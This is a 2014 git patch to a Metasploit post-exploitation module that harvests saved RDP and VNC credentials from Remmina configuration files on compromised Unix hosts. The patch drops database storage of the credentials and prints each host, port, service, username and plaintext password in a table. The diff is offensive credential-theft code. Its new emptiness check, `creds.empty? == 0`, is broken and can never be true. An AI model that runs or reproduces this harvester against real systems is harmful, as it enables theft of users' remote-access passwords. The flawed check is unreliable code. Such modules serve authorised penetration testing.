From 6e1cdfde369abb6052e3e19b31a3def12206836e Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 30 Oct 2014 16:11:13 -0700 Subject: [PATCH] Rip out create_credential* stuff. Use what works --- modules/post/multi/gather/remmina_creds.rb | 78 ++++++++++------------ 1 file changed, 35 insertions(+), 43 deletions(-) diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index 4b3f12fa1b..ebff190234 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -11,28 +11,40 @@ class Metasploit3 < Msf::Post include Msf::Post::Unix def initialize(info = {}) - super(update_info(info, - 'Name' => 'UNIX Gather Remmina Credentials', - 'Description' => %q( - Post module to obtain credentials saved for RDP and VNC - from Remmina's configuration files. These are - encrypted with 3DES using a 256-bit key generated by - Remmina which is (by design) stored in (relatively) - plain text in a file that must be properly protected. - ), - 'License' => MSF_LICENSE, - 'Author' => ['Jon Hart '], - 'Platform' => %w(bsd linux osx unix), - 'SessionTypes' => %w(shell meterpreter) - )) + super(update_info( + info, + 'Name' => 'UNIX Gather Remmina Credentials', + 'Description' => + "Post module to obtain credentials saved for RDP and VNC + from Remmina's configuration files. These are + encrypted with 3DES using a 256-bit key generated by + Remmina which is (by design) stored in (relatively) + plain text in a file that must be properly protected.", + 'License' => MSF_LICENSE, + 'Author' => ['Jon Hart '], + 'Platform' => %w(bsd linux osx unix), + 'SessionTypes' => %w(shell meterpreter) + )) end def run - creds_count = extract_all_creds - if creds_count == 0 + creds = extract_all_creds + creds.uniq! + if creds.empty? == 0 print_status('No Reminna credentials collected') else - print_good("Collected #{creds_count} sets of Remmina credentials") + vprint_good("Collected #{creds.size} sets of Remmina credentials") + cred_table = Rex::Ui::Text::Table.new( + 'Header' => 'Remmina Credentials', + 'Indent' => 1, + 'Columns' => %w(Host Port Service User Password) + ) + + creds.each do |cred| + cred_table << cred + end + + print_line(cred_table.to_s) end end @@ -54,7 +66,7 @@ class Metasploit3 < Msf::Post # Extracts all remmina creds found anywhere on the target def extract_all_creds - creds_count = 0 + creds = [] user_dirs = enum_user_directories if user_dirs.empty? print_error('No user directories found') @@ -91,15 +103,15 @@ class Metasploit3 < Msf::Post if cred_files.empty? vprint_status("No Remmina credential files in #{remmina_dir}") else - creds_count += extract_creds(secret, cred_files) + creds |= extract_creds(secret, cred_files) end end end - creds_count + creds end def extract_creds(secret, files) - creds_count = 0 + creds = [] files.each do |file| settings = get_settings(file) if settings.empty? @@ -140,27 +152,7 @@ class Metasploit3 < Msf::Post end if host && user && password - credential_core = create_credential( - origin_type: :session, - post_reference_name: self.refname, - private_type: :password, - private_data: password, - session_id: session_db_id, - username: user, - workspace_id: myworkspace_id - ) - login_data = { - address: host, - port: port, - protocol: 'tcp', - service_name: proto.downcase, - core: credential_core, - access_level: 'User', - status: Metasploit::Model::Login::Status::UNTRIED, - workspace_id: myworkspace_id - } - create_credential_login(login_data) - creds_count += 1 + creds << [ host, port, proto.downcase, user, password ] else missing = [] missing << 'host' unless host @@ -169,7 +161,7 @@ class Metasploit3 < Msf::Post vprint_error("No #{missing.join(',')} in #{file}") end end - creds_count + creds end def get_settings(file)